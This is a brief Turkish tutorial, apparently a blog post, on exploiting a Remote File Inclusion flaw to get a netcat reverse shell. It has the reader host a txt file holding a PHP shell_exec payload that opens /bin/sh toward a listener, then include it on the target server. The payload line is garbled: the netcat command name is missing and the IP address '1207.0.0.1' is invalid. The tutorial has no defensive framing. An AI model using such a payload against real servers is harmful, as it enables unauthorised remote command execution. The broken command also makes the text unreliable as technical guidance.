RFI İLE NETCAT BAĞLANTISI

Dosya ekleme güvenlik açığı, en çok komut dosyası çalıştırma süresine dayanan web uygulamalarını etkilediği görülen bir tür web güvenlik açığıdır. Remote File Inclusion ( Uzaktan Dosya Ekleme )

bu kısımda rfı tespit ettik ve bu rfı zafiyetinden faydalanarak uzaktan bir txt dosyası çekerek netcat bağlantısı alcaz

bir txt dosyası içerisine <?php echo shell_exec(” -e /bin/sh 1207.0.0.1 8080″); ?> yazıyorz

bu txt dosyasımızı uzak bir sunucuya yükleyip hedef sunucuya çekcez

bitti